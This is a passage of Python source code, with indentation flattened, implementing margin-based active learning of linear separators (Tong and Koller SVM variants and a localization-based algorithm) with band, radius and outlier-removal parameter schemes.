# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
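The average-margin rule used above accepts an unlabeled candidate only when its unsigned margin falls below half the mean signed margin of the labeled pool. A small numpy sketch of that acceptance test (names and data hypothetical):

```python
import numpy as np

def below_half_average_margin(w, X_labeled, y_labeled, x_candidate):
    # Mean signed margin y_i * (w . x_i) over the labeled pool
    avg_margin = np.mean(y_labeled * (X_labeled @ w))
    # Accept the candidate if it lies well inside the averaged margin band
    return bool(abs(x_candidate @ w) < 0.5 * avg_margin)

w = np.array([1.0, 0.0])
X = np.array([[2.0, 0.0], [-1.0, 1.0]])
y = np.array([1.0, -1.0])
accept = below_half_average_margin(w, X, y, np.array([0.2, 5.0]))  # -> True
```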
'''
Batch version of the simple margin soft learner described in Tong and Koller
'''
class SimpleMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
self.initial_sample = 5
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the smallest margin
margins = abs(svm.margin(U))
min_margin = inf
min_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
cur_margin = margins[i]
if cur_margin < min_margin:
min_margin = cur_margin
min_index = i
# Query its label
X = vstack((X, U[min_index]))
Y = vstack((Y, array([oracle(ids[min_index])]).reshape((1,1))))
used.add(ids[min_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Batch version of the Max Min Soft SVM learner described in Tong and Koller
'''
class MaxMinMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
self.initial_sample = 5
self.pointsusage = 0
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
self.pointsusage = label_budget
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Create standard SVM object
svm = soft_SVM(self.d, self.C)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the largest min-margin
max_min_margin = 0
max_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
# Compute the two margins and take the min
cur_margins = []
for label in (-1, 1):
new_X = vstack((X, U[i]))
new_Y = vstack((Y, array([label]).reshape((1,1))))
svm.batch_train(new_X, new_Y)
cur_margin = min(abs(svm.margin(new_X[i])) for i in range(len(new_X)))
cur_margins.append(cur_margin)
cur_min_margin = min(cur_margins)
if cur_min_margin > max_min_margin:
max_min_margin = cur_min_margin
max_index = i
# Query its label
X = vstack((X, U[max_index]))
Y = vstack((Y, array([oracle(ids[max_index])]).reshape((1,1))))
used.add(ids[max_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
self.w = svm.w
'''
Batch version of the Ratio Margin Soft SVM learner described in Tong and Koller
'''
class RatioMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
self.initial_sample = 5
self.pointsusage = 0
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
self.pointsusage = label_budget
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the largest min-margin-ratio
max_min_margin_ratio = 0
max_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
# Compute the two margins and take the min
cur_margins = []
for label in (-1, 1):
new_X = vstack((X, U[i]))
new_Y = vstack((Y, array([label]).reshape((1,1))))
svm.batch_train(new_X, new_Y)
cur_margin = min(abs(svm.margin(new_X[j])) for j in range(len(new_X)))
cur_margins.append(cur_margin)
margin_ratios = (cur_margins[0] / cur_margins[1],
cur_margins[1] / cur_margins[0])
cur_min_margin_ratio = min(margin_ratios)
if cur_min_margin_ratio > max_min_margin_ratio:
max_min_margin_ratio = cur_min_margin_ratio
max_index = i
# Query its label
X = vstack((X, U[max_index]))
Y = vstack((Y, array([oracle(ids[max_index])]).reshape((1,1))))
used.add(ids[max_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
self.w = svm.w
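'''
The ratio scoring used above reduces to a one-line rule; a minimal sketch (hypothetical helper name):
'''

```python
def ratio_margin_score(m_neg, m_pos):
    # min of the two margin ratios: 1.0 when the two tentative
    # labelings are equally plausible, approaching 0 as one dominates
    return min(m_neg / m_pos, m_pos / m_neg)
```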
'''
Implementation of Average Margin Soft SVM described in Tong and Koller
'''
class AverageMarginSoftSVMBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
# Query the labels of 10 examples
start = min(10, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while (len(labeled) < label_budget) and (len(used) < len(U)):
# Find an unlabeled example with a small margin
avg_margin = sum(Y[i] * svm.margin(X[i]) for i in range(len(labeled))) / len(labeled)
p = len(used)
while abs(svm.margin(U[p])) >= 0.5 * avg_margin:
used.add(ids[p])
p += 1
if p == len(U):
break
if len(used) == len(U):
break
# Query its label
X = vstack((X, U[p]))
Y = vstack((Y, array([oracle(ids[p])]).reshape((1,1))))
labeled.append(ids[p])
used.add(ids[p])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
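'''
The scan for a small-margin point in AverageMarginSoftSVMBatch can be isolated as below. This is a sketch with a hypothetical helper name, assuming margins of the unlabeled pool are precomputed:
'''

```python
def first_small_margin(margins, avg_margin, start=0):
    # index of the first point whose absolute margin falls below half
    # the average labeled margin, or None when the scan exhausts the pool
    for p in range(start, len(margins)):
        if abs(margins[p]) < 0.5 * avg_margin:
            return p
    return None
```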
'''
First implementation of the base version of the algorithm described in the STOC 2014 paper - The power of localization in effectively learning linear separators
Adversarial noise version only
Initialization of parameters based on upper bounds in the paper
'''
class LinearSeparatorsNoiseSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d, eps, c1, c2, c3, c4):
LinearLearner.__init__(self, d, w = None)
self.eps = eps
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
def active_source_train(self, source, oracle, label_budget):
itr = int(log(1/self.eps)/log(2)) - 2
m = zeros((itr+1))
b = zeros((itr+1))
r = zeros((itr+1))
n = zeros((itr+1))
t = zeros((itr+1))
#print itr
# Generator function for mk, bk, rk, nk, tk
for i in range(0,itr+1):
b[i] = self.c1*pow(2,-i) # * pow(self.d,-1/2.0)) # cutoff values
r[i] = self.c2*(pow(2,-i) * pi) # radius cutoff
#n[i] = label_budget/pow(2,itr-i-1) # limits the unlabeled samples per SVM iteration <needs to increase exponentially>
#m[i] = self.c3*(pow(d,2) + d*i)/3 # max number of labels allowed
m[i] = self.c3*label_budget/itr
t[i] = self.c4*pow(2,-i) # * pow(self.d,-1/2.0))
#print "reached Generator function in Linear Noise Separators"
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
c = set()
U, ids = source(int(m[0]))
for i in range(int(m[0])):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
c.add(ids[i])
#print "sending data to the PCA"
# PCA code for finding the eigenvectors and eigenvalues. <limit data by exp(dim/8); not implemented, does not need to be>
pca = PCA(self.d)
pca.pca_run(X,Y)
self.w = pca.w
# Creating the working set and the temp arrays for the weight update
workingset = []
tempx = array([]).reshape((0,self.d))
k = 1
# populating workingset with m[1]
U, ids = source(int(m[1]))
for i in range(int(m[1])):
workingset.append(ids[i])
tempx = vstack((tempx, U[i]))
while k < itr:
#print "iteration number: "+str(k)
# Creating set for SVM
P = array([]).reshape((0, self.d))
Q = array([]).reshape((0, 1))
# Querying labels, subsampling points from workingset, to get labels for optimization problem
for i in range(int(m[k])):
P = vstack((P, tempx[i]))
Q = vstack((Q, array([oracle(workingset[i])]).reshape(1,1)))
# QP to find w_improved, also need to send rk, tk, wk-1
qp = QP(self.d)
qp.train(P, Q, r[k], t[k], self.w)
self.w = qp.w
# clearing the working set and making tempx zero
workingset = []
tempx = array([]).reshape((0,self.d))
#print 'query additional points from the source, keeping x only when |w_improved.x| < bk'
while len(workingset) <= int(m[k+1]):
U, ids = source(1)
if abs(dot(self.w, U[0])) >= b[k]:
continue
else:
workingset.append(ids[0])
tempx = vstack((tempx, U[0]))
k +=1
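'''
The rejection step above keeps a fresh sample only when it falls inside the margin band |w.x| < b. The loop can be sketched against any point source; the `source` callable below is a hypothetical stand-in for the streaming source used here:
'''

```python
import numpy as np

def sample_in_band(source, w, b, count):
    # draw points from source() until `count` of them lie strictly
    # inside the band |w.x| < b, rejecting the rest
    band = []
    while len(band) < count:
        x = source()
        if abs(np.dot(w, x)) < b:
            band.append(x)
    return np.vstack(band)
```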
'''
Implementation of the adversarial noise version of the algorithm described in the STOC 2014 paper
The major change from Method 1 is the way the variables are initialized
'''
class LinearNoiseMethod2Source(LinearLearner, ActiveSourceLearner):
def __init__(self, d, eps, c1, c2, c3, c4):
LinearLearner.__init__(self, d, w = None)
self.eps = eps
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
def active_source_train(self, source, oracle, label_budget):
itr = int(log(1/self.eps)/log(2))+2
#print "total iterations:"+str(itr)
m = zeros((itr+1))
b = zeros((itr+1))
r = zeros((itr+1))
n = zeros((itr+1))
t = zeros((itr+1))
#print itr
# Generator function for mk
for i in range(0,itr+1):
m[i] = label_budget/itr
# Estimating parameters
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
c = set()
U, ids = source(int(m[0]))
for i in range(int(m[0])):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
c.add(ids[i])
# learning a more accurate weight vector using the svm algorithm (can be replaced by hinge loss minimization later)
svm = SVM(self.d)
svm.batch_train(X, Y)
tot = 0
avgtot = 0
# Estimate the band cutoff b as a 1/|w.x|-weighted average of |w.x|
# (this collapses to the harmonic mean of the absolute margins)
for i in range(int(m[0])):
avgtot += abs(dot(svm.w,X[i])) * 1/(abs(dot(svm.w, X[i])))
tot += 1/abs(dot(svm.w,X[i]))
b = avgtot/tot
r = b * pow(self.d, 0.5) * pi # use 0.5: pow(self.d, 1/2) is pow(d, 0) under Python 2 integer division
t = b
#print "cutoff, normalizing factor, radius"
#print b,t,r
# access to the training examples and their labels
tempx = array([]).reshape((0, self.d))
workingset = []
U, ids = source(int(m[1]))
for i in range(int(m[1])):
tempx = vstack((tempx, U[i]))
workingset.append(ids[i])
k=1
while (k < itr):
#print "iteration number: "+str(k)
# Creating set for SVM
P = array([]).reshape((0, self.d))
Q = array([]).reshape((0, 1))
# Querying labels, subsampling points from workingset, to get labels for optimization problem
for i in range(int(m[k])):
P = vstack((P, tempx[i]))
Q = vstack((Q, array([oracle(workingset[i])]).reshape(1,1)))
# QP to find w_improved, also need to send rk, tk, wk-1
qp = QP(self.d)
qp.train(P, Q, r, t, self.w)
self.w = qp.w
tot = 0
avgtot = 0
# Re-estimate the band cutoff b as the harmonic mean of the absolute margins
for i in range(int(m[k])):
avgtot += abs(dot(self.w,P[i])) * 1/(abs(dot(self.w, P[i])))
tot += 1/abs(dot(self.w,P[i]))
b = avgtot/tot
r = b * pow(self.d, 0.5) * pi # use 0.5: pow(self.d, 1/2) is pow(d, 0) under Python 2 integer division
t = b
# clearing the working set and making tempx zero
workingset = []
tempx = array([]).reshape((0,self.d))
#print "cutoff, normalizing factor, radius"
#print b,t,r
# Query additional points from the source, keeping x only when |w_improved.x| < b
while len(workingset) <= int(m[k+1]):
U, ids = source(1)
if abs(dot(self.w, U[0])) >= b:
continue
else:
workingset.append(ids[0])
tempx = vstack((tempx, U[0]))
k +=1
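'''
The band estimate computed in both loops above is a 1/|w.x|-weighted average of |w.x|, which collapses to the harmonic mean of the absolute margins. A self-contained sketch (hypothetical helper name):
'''

```python
import numpy as np

def harmonic_band(w, X):
    # sum(|w.x| * 1/|w.x|) / sum(1/|w.x|) == n / sum(1/|w.x|),
    # i.e. the harmonic mean of the absolute margins
    margins = np.abs(np.dot(X, w))
    return len(margins) / np.sum(1.0 / margins)
```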
'''
Batch version of the base implementation
'''
class LinearSeparatorsNoiseBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d, eps, c1, c2, c3, c4):
LinearLearner.__init__(self, d, w = None)
self.eps = eps
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
def active_batch_train(self, U, ids, oracle, label_budget):
itr = int(log(1/self.eps)/log(2)) - 2
m = zeros((itr+1))
b = zeros((itr+1))
r = zeros((itr+1))
n = zeros((itr+1))
t = zeros((itr+1))
count = len(U) # Here U is set to a fraction of the dataset
# Generator function for mk, bk, rk, nk, tk
for i in range(0,itr+1):
b[i] = self.c1*pow(2,-i) # * pow(self.d,-1/2.0)) # cutoff values
r[i] = self.c2*(pow(2,-i) * pi) # radius cutoff
m[i] = int(self.c3*label_budget/itr)
t[i] = self.c4*pow(2,-i) # * pow(self.d,-1/2.0))
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
used = set()
for i in range(int(m[0])):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
used.add(ids[i])
# PCA code for finding the eigenvectors and eigenvalues. <limit data by exp(dim/8); not implemented, does not need to be>
pca = PCA(self.d)
pca.pca_run(X,Y)
self.w = pca.w
# Creating the working set and the temp arrays for the weight update
workingset = []
tempx = array([]).reshape((0,self.d))
k = 1
use_count = len(used)
# populating workingset with m[1]
for i in range(int(m[1])):
workingset.append(ids[use_count+i])
tempx = vstack((tempx, U[use_count+i]))
used.add(ids[use_count+i])
while (k < itr) and (len(used) < len(U)):
#print 'iteration number, margin, norm, radius :'
#print str(k),str(b[k]),str(t[k]),str(r[k])
#print " data points used, data points sampled"
#print len(workingset), len(used)
# Creating set for SVM
P = array([]).reshape((0, self.d))
Q = array([]).reshape((0, 1))
# Querying labels, subsampling points from workingset, to get labels for optimization problem
for i in range(int(m[k])):
P = vstack((P, tempx[i]))
Q = vstack((Q, array([oracle(workingset[i])]).reshape(1,1)))
# QP to find w_improved, also need to send rk, tk, wk-1
qp = QP(self.d)
qp.train(P, Q, r[k], t[k], self.w)
self.w = qp.w
'''
# You will operate in k-1 space, for k=2 you are looking at the difference between k=1 self.w and k=2 self.w
if k > 1:
dis_disregion =0.0
dis_aggregion =0.0
ratio =0.0
for i in range(len(U)):
if sign(dot(old_w,U[i])) != sign(dot(self.w,U[i])):
if abs(dot(old_w, U[i])) < b[k-1]:
dis_disregion += 1
else:
dis_aggregion += 1
print 'In iteration ' + str(k-1) + ' disagreement within margin is ' + str(dis_disregion) + ' disagreement outside margin is ' + str(dis_aggregion)
if dis_disregion ==0:
ratio=0
else:
ratio= float(dis_aggregion/dis_disregion)
print 'Ratio of disagreement is ' + str(ratio)
print '\n'
'''
old_w = self.w
# clearing the working set and making tempx zero
workingset = []
tempx = array([]).reshape((0,self.d))
#print self.w
while (len(workingset) <= int(m[k+1])) and (len(used) < count):
p = len(used)
used.add(ids[p])
if abs(dot(self.w, U[p])) >= b[k]:
continue
else:
workingset.append(ids[p])
tempx = vstack((tempx, U[p]))
k +=1
'''
USE THIS
Base implementation of the Margin Based Method, incorporating different strategies and options for execution
Based on the STOC 2014 paper - The power of localization in effectively learning linear separators
Initialization based on the averaging algorithm
The hinge loss solver can be cvxopt, sgd, hard_cvxopt, or svm
Implements outlier removal
'''
class MarginBasedActiveLearnerBase(LinearLearner, ActiveBatchLearner):
def __init__(self, d, num_iters):
LinearLearner.__init__(self, d, w = None)
self.num_iters = num_iters
self.separators = []
self.pointsusage = 0
self.combine_final = False
def initialize_weights(self, X, Y):
# Use PCA
#pca = PCA(self.d)
#pca.pca_run(X)
#self.w = pca.w
# Use averaging algo
avg = Average(self.d)
avg.batch_train(X,Y)
self.w = avg.w
def hinge_loss_minimization(self, X, Y, tau, w, r):
if SOLVER == "cvxopt":
qp = QP(self.d)
qp.train(X, Y, r, tau, w)
self.w = qp.w
elif SOLVER == 'sgd':
sgd = HingeLossSGD2(self.d, tau, w, r)
sgd.batch_train(X, Y)
self.w = sgd.w
elif SOLVER == 'hard_cvxopt':
qp = QP_hardmargin(self.d)
qp.train(X, Y, r, tau, w)
self.w = qp.w
elif SOLVER == 'svm':
qp = soft_SVM(self.d, tau)
qp.batch_train(X,Y)
self.w = qp.w
else:
raise ValueError, 'Solver %s not implemented.' % SOLVER
def active_batch_train(self, U, ids, oracle, label_budget):
itr = self.num_iters
count = len(U)
# Set up number of examples in each iteration
m, n = self.compute_sizes(count, label_budget, itr)
# Print some initialization info
print
print self.__class__.__name__
print 'Iterations:', itr
print 'm:', m
print 'n:', n
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
used = set()
for i in range(m[0]):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
used.add(ids[i])
#print "Ids picked up in the first iteration of the active algorithm"
#print used
# Pick starting weight vector based on initial sample
self.initialize_weights(X, Y)
self.separators.append(self.w)
# Keep track of all labeled data
R = array([]).reshape((0, self.d))
S = array([]).reshape((0, 1))
for k in range(1, itr):
b, t, r = self.set_parameters(U, k)
# Print current iteration info
print
print 'k:', k
print 'b:', b
print 't:', t
print 'r:', r
# Set of points to send to outlier removal
P = array([]).reshape((0,self.d))
workingset = []
# Find n[k] additional points within the band
while (len(workingset) < n[k]) and (len(used) < count):
next = len(used)
used.add(ids[next])
if abs(dot(self.w, U[next])) <= b:
P = vstack((P, U[next]))
workingset.append(ids[next])
print "Ids chosen in iteration " + str(k)
print workingset
# Check unlabeled data usage and break if necessary
if len(workingset) != n[k]:
print
print 'Out of unlabeled data.'
break
# Perform outlier removal on P
chosen = self.outlier_removal(P, m[k], b, r, t, self.w)
assert len(chosen) == m[k]
# Query labels of the selected points
X = P[chosen]
Y = array([]).reshape((0, 1))
for i in chosen:
Y = vstack((Y, array([oracle(workingset[i])]).reshape(1,1)))
R = vstack((R, X))
S = vstack((S, Y))
# Perform constrained hinge loss minimization on X, Y (solver chosen by the module-level SOLVER; the old local assignment 'soft_cvxopt' matched no solver branch and was dead code)
self.hinge_loss_minimization(X, Y, t, self.w, r)
self.separators.append(self.w)
print "weight vector in iteration " + str(k)
print self.w
# Print some end of iteration info?
# Calculate the final weight vector based on points labeled so far.
if self.combine_final:
for i in range(len(workingset)):
if len(S) + m[0] < label_budget:
R = vstack((R, P[i]))
S = vstack((S, array([oracle(workingset[i])]).reshape(1,1)))
else:
break
self.hinge_loss_minimization(R, S, t, self.w, r)
self.separators.append(self.w)
print "Final Weight Vector"
print self.w
self.pointsusage = len(S) + m[0]
# Print final info
print
print 'Label usage:'
print 'budget:', label_budget
print 'used: ', self.pointsusage
print
print 'Unlabeled usage:'
print 'total:', count
print 'used: ', len(used)
'''
Adversarial noise only
Specific initialization of parameters
'''
class MarginBasedBasic(MarginBasedActiveLearnerBase):
def __init__(self, d, num_iters):
MarginBasedActiveLearnerBase.__init__(self, d, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Default is no outlier removal, so n = m
for i in range(num_iters):
n[i] = m[i]
return m, n
def outlier_removal(self, P, m, b, r, tau, w):
# No outlier removal. Return all indices.
return array(range(m))
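'''
The logarithmic label schedule in compute_sizes can be exercised on its own; a hypothetical free-function version:
'''

```python
from math import log

def log_label_schedule(budget, iters):
    # m_i grows like log(i + 2); the integer-rounding remainder is
    # folded into the final iteration so the schedule sums to budget
    denom = sum(log(i + 2) for i in range(iters))
    m = [int(budget * log(i + 2) / denom) for i in range(iters)]
    m[-1] += budget - sum(m)
    return m
```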
'''
Basic with Outlier Removal
'''
class MarginBasedOutlierRemoval(MarginBasedActiveLearnerBase):
def __init__(self, d, num_iters):
MarginBasedActiveLearnerBase.__init__(self, d, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Number of unlabeled examples available for outlier removal
#n_total = 0.1 * unlabeled
n_total = 10 * labeled
# Increase n_i exponentially
denom = sum(2.0**i for i in range(0, num_iters))
for i in range(num_iters):
n[i] = int(n_total * 2.0**i / denom) + m[i]
return m, n
def outlier_removal(self, P, m, b, r, tau, w):
n = P.shape[0]
# Compute distribution Q over examples in P
outlier = OutlierRemoval(self.d)
outlier.train(P, b, r, tau, w, 0.1)
Q = outlier.weightdist
Q /= lin.norm(Q, 1)
# Sample random indices based on resulting Q
chosen = nprandom.choice(n, size = m, replace = False, p = Q)
return chosen
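'''
The sampling step at the end of outlier_removal normalizes the returned weights into a distribution and draws indices without replacement. A self-contained sketch using NumPy's modern Generator API (hypothetical helper name; the original uses the legacy nprandom.choice):
'''

```python
import numpy as np

def sample_by_weights(weights, m, seed=0):
    # normalize nonnegative weights to a probability vector, then draw
    # m distinct indices in proportion to it
    q = np.asarray(weights, dtype=float)
    q = q / q.sum()
    rng = np.random.default_rng(seed)
    return rng.choice(len(q), size=m, replace=False, p=q)
```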
'''
Set the theoretical parameters
'''
class Theoretical:
def set_parameters(self, U, k):
# Constants for theoretical parameters
c1 = 1.0
c2 = 1.0
c3 = pi
# Parameters for iteration k
b = c1 * pow(2, -k) * pow(self.d, -0.5)
t = c2 * b
r = c3 * pow(2, -k)
return b, t, r
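'''
The theoretical schedule above shrinks both the band and the radius geometrically with k; a standalone sketch of the same formulas:
'''

```python
from math import pi

def theoretical_params(d, k, c1=1.0, c2=1.0, c3=pi):
    # b ~ 2^-k / sqrt(d), tau tracks b, r ~ pi * 2^-k
    b = c1 * 2.0 ** (-k) * d ** (-0.5)
    t = c2 * b
    r = c3 * 2.0 ** (-k)
    return b, t, r
```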
'''
Call this class for running the algorithm under adversarial noise with parameters initialized using theoretical specifications
'''
class MarginBasedTheoreticalParams(MarginBasedBasic, Theoretical):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
'''
Call this class for running the algorithm under malicious noise with parameters initialized using theoretical specifications
'''
class MarginBasedTheoreticalParamsOR(MarginBasedOutlierRemoval, Theoretical):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class VarianceMethod:
def set_parameters(self, U, k):
# Constants for the variance method
c1 = 1.0
c2 = 0.25
c3 = 1.0
# Compute distances and standard deviation
dotdistance = abs(self.margin(U))
std_dev = std(dotdistance)
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
# Parameters for iteration k
b = c1 * std_dev * pow(2,-k+2)
t = c2 * b
r = param.radiusparam
return b, t, r
class LinearNoiseMethodVarianceBatch(MarginBasedBasic, VarianceMethod):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodVarianceBatchOR(MarginBasedOutlierRemoval, VarianceMethod):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class AllExp:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "exp")
#print "parameters selected for allexp in kernel method"
b = param.bandparam
t = 0.25 * b
r = param.radiusparam
return b, t, r
class AllInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "inv")
#print "parameters selected for allinv in kernel method"
b = param.bandparam
t = 0.25 * b
r = param.radiusparam
return b, t, r
class AllLin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
#print "parameters selected for alllin in kernel method"
b = param.bandparam
t = 0.25 * b
r = param.radiusparam
return b, t, r
class ExpInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "exp")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class ExpLin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "exp")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "lin")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class InvExp:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "inv")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "exp")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class InvLin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "inv")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "lin")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class LinExp:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "exp")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class LinInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class LinConstInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.01
r = param1.radiusparam
return b, t, r
class LinIncInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 10 * b
r = param1.radiusparam
return b, t, r
class LinDecInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.01 * b
